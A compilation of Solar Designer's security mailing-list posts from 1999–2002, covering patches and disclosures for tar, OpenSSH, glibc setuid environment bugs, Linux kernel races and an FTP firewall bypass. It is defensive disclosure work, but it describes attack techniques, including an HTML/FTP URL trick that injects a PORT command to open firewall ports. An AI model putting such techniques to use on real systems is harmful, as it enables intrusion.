http://www.openwall.com/Owl/ (and pick an FTP mirror)
ftp://ftp.ru.openwall.com/pub/Owl/current/native.tar.gz

-- 
/sd


diff -ur tar-1.13.19.orig/src/misc.c tar-1.13.19/src/misc.c
--- tar-1.13.19.orig/src/misc.c Sat Jan 13 08:59:29 2001
+++ tar-1.13.19/src/misc.c  Sat Sep 28 13:48:03 2002
@@ -206,12 +206,12 @@
   if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2]))
return 1;

-  do
+  while (! ISSLASH (*p))
{
  if (! *p++)
return 0;
}
-  while (! ISSLASH (*p));
+  p++;
 }
 }



diff -ur tar-1.13.19.orig/src/extract.c tar-1.13.19/src/extract.c
--- tar-1.13.19.orig/src/extract.c  Sat Jan 13 08:59:29 2001
+++ tar-1.13.19/src/extract.c   Sat Sep 28 15:37:33 2002
@@ -850,7 +850,7 @@
break;

   if (absolute_names_option
- || (ISSLASH (current_link_name
+ || (! ISSLASH (current_link_name
   [FILESYSTEM_PREFIX_LEN (current_link_name)])
  && ! contains_dot_dot (current_link_name)))
{



Re: Upcoming OpenSSH vulnerability

2002-06-26 Thread Solar Designer

On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote:
> There is an upcoming OpenSSH vulnerability that we're working on with
> ISS.  Details will be published early next week.
> 
> However, I can say that when OpenSSH's sshd(8) is running with priv
> seperation, the bug cannot be exploited.
> 
> OpenSSH 3.3p was released a few days ago, with various improvements
> but in particular, it significantly improves the Linux and Solaris
> support for priv sep.  However, it is not yet perfect.  Compression is
> disabled on some systems, and the many varieties of PAM are causing
> major headaches.
> 
> However, everyone should update to OpenSSH 3.3 immediately, and enable
> priv seperation in their ssh daemons, by setting this in your
> /etc/ssh/sshd_config file:
> 
>   UsePrivilegeSeparation yes

Owl-current has been updated to include OpenSSH 3.3p1 with privilege
separation enabled (and a patch to make that work on Linux 2.2 kernels
which we continue to support).  The updated source tree and packages
went to the FTP mirrors by Monday.

This stuff is, however, still being hacked on because of certain
minor functionality problems that remain in this rushed release.
Expect further updates in the following days and next week.

It is strongly recommended that Openwall GNU/*/Linux (Owl) users
update first to these 3.3p1-based privilege separated update packages
and then to ones based on the upcoming OpenSSH releases.

The details of the changes we apply will be documented in change logs
for the OpenSSH package as well as in the system-wide change logs
under Owl/doc/CHANGES in the native tree, also available via the web:

http://www.openwall.com/Owl/CHANGES.shtml

The SSH server used to be the only Internet service provided with Owl
that didn't utilize privilege separation approaches.  Now, thanks to
the excellent work by Niels Provos, we are able to provide a system
where all the Internet services are provided with privilege-separated
implementations.  That includes FTP, SMTP, POP3, Telnet, and now SSH.

Those curious about how this all works can see our diagrams of the FTP,
POP3, and Telnet servers in our CanSecWest/core02 / NordU2002 slides:

http://www.openwall.com/presentations/core02-owl-html+images/

The FTP server is Chris Evans' vsftpd.  The POP3 server is popa3d, and
the Telnet server is a port from OpenBSD with privilege separation
introduced in a way similar to what Chris Evans did in his patches to
NetKit's (but the code is different).  In all cases, the processes
which talk to the
remote client are running as a dedicated pseudo-user (different for
each service) and chroot'ed to an empty directory (/var/empty).

For the privilege-separated OpenSSH sshd, please refer to Niels Provos'
web page on the topic:

http://www.citi.umich.edu/u/provos/ssh/privsep.html

The SMTP server is Postfix, with many of its components running in a
chroot jail:

http://www.postfix.org/security.html
http://www.postfix.org/big-picture.html

In fact, the review of file accesses performed by Postfix, which we
did as part of maintaining the package on Owl, contributed to making
Postfix's privilege separation more solid (starting with the
20011217 snapshot).

-- 
/sd



Re: Remote Timing Techniques over TCP/IP

2002-04-19 Thread Solar Designer

On Thu, Apr 18, 2002 at 09:45:53AM -0500, Mauro Lacy wrote:
> REMOTE TIMING TECHNIQUES

It's good to see these kinds of weaknesses starting to be publicized.  I
know of another similar paper to be published soon.

We've recently been discussing with Markus and Niels of OpenSSH the
possibility of applying a variation of Kocher's attack against SSH
clients with RSA/DSA authentication (where a malicious server would
obtain the client's private key and be able to use it against another
server).

I don't see how a client -> server attack against SSH would be possible
(other than on usernames and such).

The leak of usernames is of course the most obvious example; pretty much
every service is affected.  Of course we avoid leaks like that in our
code (popa3d, pam_tcb on Owl), but we haven't fixed our system libraries
(such as glibc's NSS modules) yet, and those are used by all services.

-- 
/sd



Re: local root compromise in openbsd 3.0 and below

2002-04-11 Thread Solar Designer

On Thu, Apr 11, 2002 at 01:29:28PM +0200, Przemyslaw Frasunek wrote:
> default root crontab entry looks like:
> 
> # do daily/weekly/monthly maintenance
> # on monday only (techie)
> 30  1   *   *   1   /bin/sh /etc/daily 2>&1 | tee /var/log/d
> aily.out | mail -s "`/bin/hostname` daily output" root
> 30  3   *   *   6   /bin/sh /etc/weekly 2>&1 | tee /var/log/
> weekly.out | mail -s "`/bin/hostname` weekly output" root
> 30  5   1   *   *   /bin/sh /etc/monthly 2>&1 | tee 
>/var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root

Dangerous stuff.  (The same applies to much of /etc/security on *BSD's.)

> Patch: 
>http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

The bug appears to have been introduced before OpenBSD 2.9 (in January,
2001), with this commit message:

Changes from Don Beusee:
[...other changes skipped...]
o tilde commands work regardless of interactive mode.

The mailx (/bin/mail) on Owl is derived from OpenBSD 2.7 code and thus
doesn't contain this vulnerability.  (We should sync with the new OpenBSD
code eventually, but as we can see, doing a sync blindly would be worse
than not doing it at all for a while longer.)  We also don't have cron
jobs like this.

-- 
/sd



Re: x86 vulnerability

2001-04-28 Thread Solar Designer

On Thu, Apr 26, 2001 at 03:41:49PM +0200, Florian Weimer wrote:
> Johnny Cyberpunk * <[EMAIL PROTECTED]> writes:
> > The LSD Team has found this bug in the ARGUS System. Know since January
> > 2001, found by a NETBSD-Team and fixed very earlier than SUN has.
> > SUN fixed it primal on 17.04.2001 and ARGUS hasn't patched it.
>
> Has anybody looked at the LDT modification syscall in the Linux
> kernel?

I did, and wrote this in a private discussion a few days ago:

| I've checked the implementation of modify_ldt(2) on Linux 2.0 and 2.2
| after the NetBSD advisory was released (the next day, actually) and
| posted my comments to security-audit:
|
| http://marc.theaimsgroup.com/?l=linux-security-audit&m=98237041708897
|
| Basically, this instance of the vulnerability doesn't affect Linux and
| I'm not aware of another which would, but the code could be made safer.
|
| Of course, it would be nice if someone double-checks this.

Matt Chapman has independently reviewed the same code now (thanks!)

--
/sd



Re: ptrace/execve race condition exploit (non brute-force)

2001-03-28 Thread Solar Designer

On Wed, Mar 28, 2001 at 01:32:15AM +0200, Mariusz Woloszyn wrote:
> Anyway: here is a fast way to fix the problem (but intoduces new one), the
> kernel module that disables ptrace syscall.

Don't forget that the race isn't only against ptrace.  There's
procfs.  Fortunately, get_task() in fs/proc/mem.c checks for
PF_PTRACED, so the worst ways of abuse via procfs are solved with
disabling ptrace.  But it is not so obvious what other attacks
remain possible.

--
/sd



Re: ptrace/execve race condition exploit (non brute-force)

2001-03-27 Thread Solar Designer

On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:

Hi,

> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.

Thanks for not releasing this before Linux 2.2.19 is out.  It would
be even better if you delayed this until the vendor updates are ready
(should be very soon) like I was planning to.

> It works even on openwall patched kernels (including broken fix in 2.2.18ow4)

Yes, the fix in 2.2.18-ow4 and 2.0.39-ow2 is insufficient -- it only
reduced the window without completely fixing the race.

I'd like to thank Rafal Wojtczuk for discovering the problem with my
original fix almost immediately after its release and reporting it to
me and the affected vendors privately.  Unfortunately, Linux 2.2.19
and the vendor updates couldn't be released until now for other valid
reasons(*), so I had to decide against releasing a 2.2.18-ow5, submit
the correct fix for 2.2.19, and wait until it was released.

Linux 2.2.19 is out.  I've released the 2.2.19-ow1 and 2.0.39-ow3
patches yesterday:

http://www.openwall.com/linux/

Please upgrade to one of these versions.

(*) To be explained here after the vendor updates are ready.

--
/sd



Passive Analysis of SSH (Secure Shell) Traffic

2001-03-19 Thread Solar Designer
[...] reduce the
search space for uniformly randomly chosen passwords of 8 characters
by a factor of 50.

Although the paper is not yet publicly available, vendors working to
fix these problems may contact David Wagner or Dawn Xiaodong Song to
obtain a copy.


 Fixes
 -----

Several SSH implementations have been changed to include fixes which
reduce the impact of some of the traffic analysis attacks described
in this advisory.  It is important to understand that these fixes are
by no means a complete solution to traffic analysis -- only simple
remediation for the most pressing vulnerabilities described above.

OpenSSH:

Fixes have been initially applied to OpenSSH starting with version
2.5.0.  OpenSSH 2.5.2 contains the more complete versions of the
fixes and solves certain interoperability issues associated with the
earlier versions.

PuTTY:

PuTTY 0.52 will include defenses against inferring length or entropy
of initial login passwords, for both SSH-1 and SSH-2.

SSH 1.2.x:

SSH 1.2.x users can use this unofficial patch (the patch is against
version 1.2.27, but applies to 1.2.31 as well).  Please note that a
SSH server with this patch applied will not interoperate with client
versions 1.2.18 through 1.2.22 (inclusive).

--- ssh-1.2.27.orig/sshconnect.c  Wed May 12 15:19:29 1999
+++ ssh-1.2.27/sshconnect.c Tue Feb 20 08:38:57 2001
@@ -1258,6 +1258,18 @@
 fatal("write: %.100s", strerror(errno));
 }

+void ssh_put_password(char *password)
+{
+  int size;
+  char *padded;
+
+  size = (strlen(password) + (1 + (32 - 1))) & ~(32 - 1);
+  strncpy(padded = xmalloc(size), password, size);
+  packet_put_string(padded, size);
+  memset(padded, 0, size);
+  xfree(padded);
+}
+
 /* Starts a dialog with the server, and authenticates the current user on the
server.  This does not need any extra privileges.  The basic connection
to the server must already have been established before this is called.
@@ -1753,7 +1765,7 @@
 /* Asks for password */
 password = read_passphrase(pw->pw_uid, prompt, 0);
 packet_start(SSH_CMSG_AUTH_TIS_RESPONSE);
-packet_put_string(password, strlen(password));
+ssh_put_password(password);
 memset(password, 0, strlen(password));
 xfree(password);
 packet_send();
@@ -1791,7 +1803,7 @@
 {
   password = read_passphrase(pw->pw_uid, prompt, 0);
   packet_start(SSH_CMSG_AUTH_PASSWORD);
-  packet_put_string(password, strlen(password));
+  ssh_put_password(password);
   memset(password, 0, strlen(password));
   xfree(password);
   packet_send();
--- ssh-1.2.27.orig/serverloop.c  Wed May 12 15:19:28 1999
+++ ssh-1.2.27/serverloop.c Tue Feb 20 08:38:56 2001
@@ -522,6 +522,9 @@
 void process_output(fd_set *writeset)
 {
   int len;
+#ifdef USING_TERMIOS
+  struct termios tio;
+#endif

   /* Write buffered data to program stdin. */
   if (fdin != -1 && FD_ISSET(fdin, writeset))
@@ -543,7 +546,18 @@
 }
   else
 {
-  /* Successful write.  Consume the data from the buffer. */
+  /* Successful write. */
+#ifdef USING_TERMIOS
+  if (tcgetattr(fdin, &tio) == 0 &&
+  !(tio.c_lflag & ECHO) && (tio.c_lflag & ICANON)) {
+/* Simulate echo to reduce the impact of traffic analysis. */
+packet_start(SSH_MSG_IGNORE);
+memset(buffer_ptr(&stdin_buffer), 0, len);
+packet_put_string(buffer_ptr(&stdin_buffer), len);
+packet_send();
+  }
+#endif
+  /* Consume the data from the buffer. */
   buffer_consume(&stdin_buffer, len);
   /* Update the count of bytes written to the program. */
   stdin_bytes += len;


 SSHOW, the SSH traffic analysis tool
 ------------------------------------

We have developed an SSH traffic analysis tool, which can be used to
demonstrate many of the weaknesses described in this advisory.  The
source for the initial version of the tool is included below.  Future
versions will be maintained as a part of Dug Song's dsniff package,
available at:

http://www.monkey.org/~dugsong/dsniff/

The raw IP networking libraries required by SSHOW may be obtained at:

http://www.tcpdump.org/release/
    http://www.packetfactory.net/Projects/Libnet/
http://www.packetfactory.net/Projects/Libnids/

<++> sshow.c
/*
 * SSHOW.
 *
 * Copyright (c) 2000-2001 Solar Designer <[EMAIL PROTECTED]>
 * Copyright (c) 2000 Dug Song <[EMAIL PROTECTED]>
 *
 * You're allowed to do whatever you like with this software (including
 * re-distribution in source and/or binary form, with or without
 * modification), provided that credit is given where it is due and any
 * modified versions are marked as such.  There's absolutely no warranty.
 *
 * Note that you don't have to re-distribute modified versions of th

Re: /N grouped concurrency limits for network services

2001-03-05 Thread Solar Designer

On Sat, Mar 03, 2001 at 04:12:46AM -0800, Dan Kaminsky wrote:
> > There's no memory consumption problem with implementing this feature
> > like the Bugtraq post implied.
>
> Sure there is.  To cover the ground of a single /16 ACL, 256 /24 ACLs are
> required.  To cover 256 /16's, 65536 /24's are required.  More memory will
> be needed for the latter than the former.

I've got several e-mails like this, so I am CC'ing the list on this
reply now.

Different people have different kinds of concurrency and/or rate
limiting in mind when talking about this.  Obviously, I was talking
about what I think is reasonable to implement.

Concurrency limiting doesn't run into any memory consumption problem.
The server only needs to maintain information about active sessions.

A reasonable combination of concurrency and rate limiting per source
address, such as what popa3d uses in standalone mode, is similar to
simple concurrency limiting with the difference that the definition
of "active" sessions is changed to include those which were recently
closed.  This implies that only accepted connections cause a "slot"
to be allocated.  Since a single source address (or netblock) could
cause up to a fixed number of slots to be allocated by keeping the
connections open, it doesn't hurt (security-wise) to also leave the
slots allocated for recently-closed connections.  The table of what
is considered an "active" session may be of a fixed size, -- it only
needs to match the server capacity.

Of course, other combinations of concurrency and rate limiting are
possible.

Implementing per-source rate limiting alone and doing so at a lower
layer may run into (solvable) memory consumption problems.

--
/sd



Re: /N grouped concurrency limits for network services

2001-03-01 Thread Solar Designer

On Wed, Feb 28, 2001 at 10:16:47AM +0100, Olaf Kirch wrote:
> Here's something I haven't seen before which I find sort of cool
> (rate limiting grouped by source IP network)...

I've been considering this for popa3d's standalone mode and for
xinetd (both already have a per source IP limit).  xinetd should
implement some defense against the low syslogd bandwidth problem
first (popa3d already has that).

I was going to have a configurable netblock size for use with this
feature, and would set it to /19 by default as that seems reasonable
for present netblock allocations.

Kurt Seifried has some valid concerns regarding IPv6.

Sebastian Krahmer had the opinion that per-source-address limits
actually introduce a DoS possibility.  I mention this here as I
suspect this is a fairly common opinion.  I don't agree.  The DoS
possibility was already there; what the limits do is reduce the
impact of such a DoS.  They also make it (very slightly) easier to
make the service unavailable to those on the same network, which
should be considered when configuring the limits, but that is an
acceptable price for the reduced impact of the attack.

The per-source limits are not very different from other limits that
can be configured for a service.  Having a limit of, say, 100 users
logged in to an FTP server prevents the entire physical server from
being DoS'ed and at the same time makes it slightly easier to DoS
just this one service.  We have to choose.  If an implementation of
FTP / *inetd didn't offer the limit, we wouldn't have the choice.

bert hubert wrote:

> I'm not certain weather its best to group ip addresses by /16 or /24 - /24
> might consume too much memory, /16 might be too broad. Perhaps this should
> be a tunable parameter.

There's no memory consumption problem with implementing this feature
like the Bugtraq post implied.

--
/sd



Re: [RHSA-2001:013-05] Three security holes fixed in new kernel

2001-02-09 Thread Solar Designer

On Thu, Feb 08, 2001 at 06:03:00PM -0500, [EMAIL PROTECTED] wrote:
> Thanks to Solar Designer for finding the sysctl bug, and
> for the versions of the sysctl and ptrace patches we used.

Thanks for crediting me, but actually it's Chris Evans who found the
sysctl bug that affects Linux 2.2.  I only provided patches.

I found a very similar sysctl "signedness" bug a few years back,
fixed in Linux 2.0.34, but it's not an issue on Linux 2.2.  So all
credit for the discovery of this new bug is to Chris Evans.

As I am posting this anyway, -- these two fixes (but _not_ the DoS
one, yet) are included in 2.2.18-ow4 and 2.0.39-ow2 patches, which
I've just released:

http://www.openwall.com/linux/

Actually, 2.0.39 only needed the execve/ptrace race condition fix.

--
/sd



Re: summary of recent glibc bugs (Re: SuSE Security Announcement: shlibs/glibc (SuSE-SA:2001:01))

2001-01-31 Thread Solar Designer

On Mon, Jan 29, 2001 at 03:17:17PM -0500, Matt Zimmerman wrote:
> On Sat, Jan 27, 2001 at 05:55:25AM +0300, Solar Designer wrote:
> > The glibc 2.2 RESOLV_HOST_CONF bug which prompted this search for bugs was
> > reported to Debian by Dale Thatcher but apparently wasn't kept private.  The
> > remaining bugs were discovered and dealt with within two days following the
> > RESOLV_HOST_CONF bug report.  As this bug got public, vendors were forced to
> > not coordinate the release of updated glibc packages.
>
> It sounds like you're implying that Debian was responsible for publicizing this
> bug.

Of course not, but I should have been more explicit about that, as
some people definitely read it this way.  Sorry about that :-( and
thanks for your detailed explanation.

> This bug was first discussed (this time around) on VULN-DEV, starting
> here:
>
> http://archives.neohapsis.com/archives/vuln-dev/2001-q1/0024.html
> (dated Sat, 6 Jan 2001 17:23:35 -0500)
>
> Dale Thatcher posted to vuln-dev about the vulnerability in a message dated
> "Mon Jan 08 2001 - 10:30:01 CST", which specifically revealed that unstable
> Debian was vulnerable.
>
> The bug was reported to Debian by thomas lakofski <[EMAIL PROTECTED]> to
> [EMAIL PROTECTED] and [EMAIL PROTECTED] in a message dated
> "Mon, 8 Jan 2001 13:34:52 + (GMT)"
> (http://lists.debian.org/debian-security-0101/msg00011.html).  Note that
> debian-security is a public, archived mailing list, like vuln-dev.
>
> In response to this (public) discussion of the vulnerability, I opened a bug
> (http://bugs.debian.org/81587) against the libc6 package (Mon, 8 Jan 2001
> 10:27:54 -0500) to bring the problem to the attention of the maintainer.  Fixed
> packages were installed into the archive Thu, 11 Jan 2001 14:57:09 -0500.  By
> this time, this vulnerability was clearly already public and being actively
> explored (and probably exploited).

--
/sd



summary of recent glibc bugs (Re: SuSE Security Announcement: shlibs/glibc (SuSE-SA:2001:01))

2001-01-29 Thread Solar Designer

On Fri, Jan 26, 2001 at 03:55:17PM +0100, Roman Drahtmueller wrote:

> The runtime-linker as used in the SuSE distributions ignores the
> content of the critical environment variables if the specified path
> begins with a slash ("/"), or if the library file name is not

s/begins with/contains/
(otherwise "../" attacks would be possible, which isn't the case)

> cached (eg it is contained in a path from /etc/ld.so.conf).
> However, Solar Designer has found out that even preloading glibc-
> native shared libraries can be dangerous: The code in the user-linked

Thanks for crediting me, but this isn't exactly what my contribution
was about.

The fact that preloading "system" libraries can be dangerous was
known before that (discussed a few years ago, including on Bugtraq).
A solution was then introduced to require that the library be "SUID"
for it to be LD_PRELOAD'able into SUID/SGID programs.  On a typical
system, there are no such libraries.

My contribution was to point out that an exploit mentioned by Jakub
Jelinek depended on this check not working.  (I've also shown a way
to exploit this property with glibc 2.1.x, but that isn't really my
discovery as it was prompted by a ChangeLog entry for an attempt to
fix that.)  Ulrich Drepper committed a fix for this preload-non-SUID-
library bug (which turned out to be in the caching you mention in the
advisory) the next day.

(My other contribution was proving that the LD_PROFILE{,_OUTPUT}
handling was indeed a real vulnerability, as suspected by Daniel
Jacobowitz.)

> To eliminate these problems, we provide update packages that completely
> disregard the LD_* variables upon runtime-linking of a binary that has
> an effective uid different from the caller's userid.

I don't see that in the SuSE package (libc-2.1.3-190.src.rpm), which seems
to only contain the fixes from the glibc CVS (which are sufficient for
the bugs we're currently aware of).

I sent this summary to vendor-sec (even though most of the bugs were
not discovered by me, this was just to ensure no vendor misses a fix
relevant to versions of glibc they package):

Date: Sat, 13 Jan 2001 03:00:34 +0300

(A few days after the fixes were committed.)

| These are the (instances of) the recently discovered glibc bugs
| (here "2.1" means 2.1 to 2.1.3, and "2.2" means 2.1.9x+):
|
| 1. LD_PRELOAD works for non-SUID libs even when running SUID/SGID.
|
| This affects both glibc 2.1 and 2.2.  The proven way to abuse this
| property is via libSegFault (overwrite any file), but even worse
| attacks (providing a root shell directly) are likely to exist.
|
| Fixed in the CVS.
|
| 2. LD_PROFILE uses a file in /var/tmp even when running SUID/SGID.
|
| Both 2.1 and 2.2.  The file is unsafely created and later mmap'ed
| for processing.  There're memory writes with addresses calculated
| from data in the file, with no bounds checking.  Thus, it definitely
| is possible to overwrite files with this, and it might be possible to
| get a root shell via this vulnerability directly.
|
| Fixed in the CVS by moving the profiling files to /var/profile (which
| should only be created if the feature is desired) for the SUID/SGID
| case.  /var/tmp is still used for non-SUID/SGID programs if run with
| LD_PROFILE set, which I dislike, but this is only a minor problem.
|
| 3. SEGFAULT_OUTPUT_NAME is trusted even when running SUID/SGID.
|
| Both 2.1 and 2.2.  As the library isn't installed SUID by default,
| this is only exploitable due to bug #1.
|
| Not fixed (the access() checks don't count).
|
| 4. MEMUSAGE_OUTPUT is trusted even when running SUID/SGID.
|
| 2.2 only (wasn't a part of glibc 2.1, but could be installed with it
| as well).  Similar to the SEGFAULT_OUTPUT_NAME.
|
| 5. RESOLV_HOST_CONF is trusted even when running SUID/SGID.
|
| 2.2 only.  Fixed in the CVS.

Date: Sun, 14 Jan 2001 14:44:56 +0300

| BTW, these recent bugs are now also fixed in glibc-2-1-branch, thanks
| to Andreas Jaeger.

The glibc 2.2 RESOLV_HOST_CONF bug which prompted this search for
bugs was reported to Debian by Dale Thatcher but apparently wasn't
kept private.  The remaining bugs were discovered and dealt with
within two days following the RESOLV_HOST_CONF bug report.  As this
bug became public, vendors were unable to coordinate the release of
updated glibc packages.

--
/sd



Re: Extending the FTP "ALG" vulnerability to any FTP client

2000-03-14 Thread Solar Designer

Hello,

>   * Send a HTML email to an HTML-enabled mail reader
> containing the tag
> ftp://ftp.rooted.com/[lots of A]aaaPORT 1,2,3,4,0,139">

I was playing with that recently as well.  Yes, this works.  Some
browsers add an extra "/" to such requests (at least on the first
check, for a directory), so one might want to add %0d%0a to the end.

It's also important that this is either an ftp URL, or some other
text-based protocol directed to 21/tcp (such as, http://server:21).

>   * Balance the number of A so that the PORT command will begin
> on a new packet boundary. This may also be done by having
> the server use a low TCP MSS to decrease the number of A's that
> one has to add.

This is not always necessary.  Linux's ip_masq_ftp module is happy to
detect PORT anywhere in packets travelling to 21/tcp.

>   * The firewall in question will incorrectly parse the resulting
> RETR /[]aPORT 1,2,3,4,0,139
> as first a RETR command and then a PORT command and open
> port 139 against your address (1.2.3.4 in this case)

It will also translate the PORT command, so that ftp.rooted.com sees
the firewall's IP address and port number that's currently redirected
to client:139.

>   * Disable active FTP. E, wait. The fix for the server side
> vulnerability was to disable passive FTP. Let's rephrase that:
>
>   * Disable FTP altogether. Block port 21. Disable FTP Application
> Layer Filters on all ports in your firewall.

There's a partial workaround: only allow access to non-privileged
ports.  Yes, there can still be vulnerable services on those. :-(
I haven't tested whether this would work with real-world FTP clients on
Win32 -- are there any that would use privileged ports?

>   * If you can't change the settings in your firewall, set the
> "FTP Proxy" setting in your browser/HTML-enabled mail reader
> to some address that doesn't exist, like 127.0.0.2. After
> this change, your browser won't be able to connect anywhere
> using FTP.

That doesn't help against the http://...:21 trick.

Signed,
Solar Designer



Re: WordPad/riched20.dll buffer overflow

1999-11-30 Thread Solar Designer

> Aleph, please kill my article if someone else says it better/first.  I've been
> waiting in silence for Solar Designer to speak up and end the debate about how
> to do this, but I guess he's away from his e-mail.

I was simply unsure if we really need to repeat this discussion (it's
been on the list already). ;-)

> > Having separate non-overlapping stack and data segments causes a great
> > many problems if you want to be able to write programs in C, given
> > that a data pointer has to be able to record the address of any
> > variable, regardless of whether it is static (data segment) or
> > automatic (stack segment).
>
> This work has already been done:  there is a kernel patch for Linux that makes
> the stack segment non-executable.  For details, go read Solar's source:
> http://www.openwall.com/linux/

In reality, the patch does exactly what it says it does: make the
user stack area (a range of user-space addresses) non-executable.

It does _not_ make the segment (in the x86 sense) non-executable (in
fact, it was already non-executable by definition; it is overlapping
with the code segment which allowed for execution on the stack).

To answer the paragraph you were replying to as well, the patch also
does _not_ stop stack and data segments from overlapping (in fact,
with the Linux 2.2 version of the patch, the stack and data segments
even share the same descriptor table entry).  I don't see how this
restriction can be related to the execute permissions, though.

What the patch does, is reduce the user-space code segment limit so
that the segment does not cover the range of addresses allocated to
the stack.  The base addresses continue to match.

Signed,
Solar Designer



Re: CERT Advisory CA-99-14 Multiple Vulnerabilities in BIND

1999-11-13 Thread Solar Designer

Hello,

> course, recommend upgrading.  In addition, we recommend running your
> nameserver as non-root and chrooted (I know setting this up is non-trivial --
> it'll be much, much easier in BINDv9).

While we're on the topic, there's a patch for running BIND 4.9.7 as
non-root and chrooted, as well as instructions on setting up the
jail, at:

http://www.openwall.com/bind/

Signed,
Solar Designer



Re: Local user can send forged packets

1999-10-27 Thread Solar Designer

>
> Several daemons drop privilege, you stop them restoring the state and thus
> expose a new exciting hole. Just copy the 2.2 fix - stop the ldisc open, that
> enforces what you need.

I've done that for 2.0.38-ow4, which also includes some ELF loader
fixes for issues (DoS) found by Pavel Kankovsky, and a few more.

Signed,
Solar Designer



Re: Compaq Alpha Bounds Checking

1999-10-21 Thread Solar Designer

> In this post below to the Linux security-audit mailing list, Solar was kind
> enough to fulfill my request for performance data on the Compaq ccc compiler
> for Linux/Alpha using bounds checking.  Astonishingly, Solar's tests showed
> virtually no performance overhead for bounds checking.  I found this to be
> both amazing and depressing for StackGuard, and went away to sulk :-)

Sorry for taking so long to answer your last post -- it's still in
my mailbox, waiting to be answered once I have the time.

> Today, I got my own access to an Linux/Alpha box with ccc, and to a Tru64
> box.  Both support the "-check_bounds" switch.  I did my own testing, and
> discovered that as far as I can tell, "-check_bounds" does NOTHING AT ALL.
> Am I missing something?

Yes, I guess so -- see below.

>  foo() {
>  char x[50];
>
>  gets(x);
>  }

I would _not_ expect this case to be covered by the compiler's bounds
checking.  This is in fact the reason I didn't use a strcpy() when
demonstrating the bounds checking to you in my first post about ccc.
Their bounds checking only applies to explicit array subscripts:

   -[no]check_bounds
   Generates  runtime  code  to check the values of array
   subscripts (and equivalent pointer arithmetic  involv-
   ing pointers produced by converting an array name to a
   pointer) to verify that  the  resulting  address  lies
   within  the  range  for  which the C standard requires
   well-defined behavior.

This was so obvious to me that I forgot to mention it on the list,
sorry.  Now I realize that by "bounds checking" people often mean
"complete protection", or close to that (with DoS in mind).

Speaking of the usage of gets() and such, even if the compiler was
able to pass bounds checking information down to functions (which ccc
doesn't do), it would at least require that you also recompile those
functions themselves.

> Thus I conclude that Solar's amazing performance results that show no
> overhead are because the compiler is lying about implementing bounds
> checking.  There is no overhead because there is no protection.

Well, they could be more verbose in their description, yes.  As for
the "no protection" -- this wasn't meant as a security feature, but
there's _some_ protection, it's just far from being complete.

Finally, as this also goes to BugTraq this time, here's a piece of my
first post on the subject that shows a case where bounds checking can
work (and does indeed work) --

[ghost@alice tests]$ cat bounds.c
#include <stdlib.h>

int f(int n, int m)
{
char buffer[100];
int i;

for (i = 0; i < n; i++)
buffer[i] = 'x';

return buffer[m];
}

int main(int argc, char **argv)
{
return f(atoi(argv[1]), atoi(argv[2]));
}
[ghost@alice tests]$ gcc bounds.c -o bounds -O -s
[ghost@alice tests]$ ./bounds  33
Segmentation fault
[ghost@alice tests]$ ./bounds 99 33
[ghost@alice tests]$ ccc bounds.c -o bounds -O
[ghost@alice tests]$ ./bounds  33
Segmentation fault
[ghost@alice tests]$ ccc bounds.c -o bounds -O -check_bounds
[ghost@alice tests]$ ./bounds  33
Trace/breakpoint trap
[ghost@alice tests]$ ./bounds 99 
Trace/breakpoint trap
[ghost@alice tests]$ ./bounds
Segmentation fault
[ghost@alice tests]$ ./bounds 99 33
[ghost@alice tests]$

The first two compiles are with gcc and ccc w/o bounds checking.  We
get segfaults.  Then the program is recompiled with bounds checking,
and we're now getting those traps (just like the man page says).  The
last two tests are to show that the traps are only generated from
bounds checking and not other errors, and that the program is still
working.  BTW, here's what the checks look like:

	mov	$3, $5
	cmpule	$3, 99, $16
	bne	$16, L$10
	mov	-18, $16
	call_pal 0xAA	# gentrap
L$10:
	[ ... some code skipped: the loop got unrolled and large ... ]
	addq	$sp, $5, $8
	ldq_u	$16, ($8)

I wouldn't say that the option did "nothing at all" to SSH -- it must
have added quite a few checks, which made the binary 5 KB larger.

Signed,
Solar Designer



Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]

1999-09-28 Thread Solar Designer

Hi,

> This is from a post I made to BugTraq on September 17, entitled
> "A few bugs...".  If you're running Linux, it appears kernels pre 2.1 will
> not be affected by this bug as they do not follow symlinks when creating
> UNIX domain sockets (Solar Designer pointed this out after trying the
> exploit on a 2.0.38 kernel; I tested on a 2.0.34 kernel, and from there
> I'm generalizing).

The same applies to mknod(2), which follows dangling symlinks on
Linux 2.2, but doesn't on 2.0.  I've changed the code not to follow
such symlinks for both mknod(2) and bind(2), in 2.2.12-ow6.

As I am posting this anyway, -- other changes to the -ow patch for
2.2 since I've announced it here include the real exit_signal fix,
and the TCP sequence number fix I took from 2.2.13pre14.  (Speaking
of the latter, it's funny how most of the randomness went into the
wrong place on the stack, and probably remained unnoticed because of
the fairly large and unused at the time "struct tcp_opt".  2.0 isn't
vulnerable.  Yet another reason to continue running 2.0.38.)

Signed,
Solar Designer



Linux 2.2.12 mini-audit

1999-09-13 Thread Solar Designer
lengths of
individual arguments.  I've even managed to make it have the same
performance that it used to; the new count() function looks a bit
like a puzzle because of that, though.  Actually, this is something
that should have been done earlier; now it can only remain in my
2.0.38 patch.

(2.0.38) (2.2.12) (*)
/proc/<pid>/ directories, and /proc/<pid>/fd symlinks could also be
accessed with any amount of zeroes prepended to their names.  This
could be used, say, to obtain an overly long cwd.  There's no obvious
security impact, but something to be fixed anyway (and that has been
done).

(2.0.38) (2.2.12) (*)
CLONE_PID could be set from the user-space, thus producing two user
processes with the same PID.  Attacks include: stopping SUID programs
from sending signals to themselves (even raise(3) wouldn't work),
covering your high resource usage by the other dummy process, making
unkillable processes that can still be running just fine (covered by
dummy zombie processes with the same PID).

(2.0.38) (2.2.12)
It is possible to request any exit_signal, not just SIGCHLD, via
clone(2).  This is normally not a problem, but there's one exception:
the parent could have executed a SUID program, and that program could
have done a "setuid(geteuid())", expecting to protect itself from
signals sent by the original user.  This feature of clone(2) can be
used to send an arbitrary signal to such a program.  I've put a
workaround into my patches, that restricts the allowed signal numbers
to SIGCHLD, SIGUSR1, SIGUSR2, or no signal, with SIGUSR1 and SIGUSR2
allowed specifically for LinuxThreads to work.  This also means that
SUID programs which use LinuxThreads remain unprotected.  A solution
to this should be developed.  I've proposed one in a comment in the
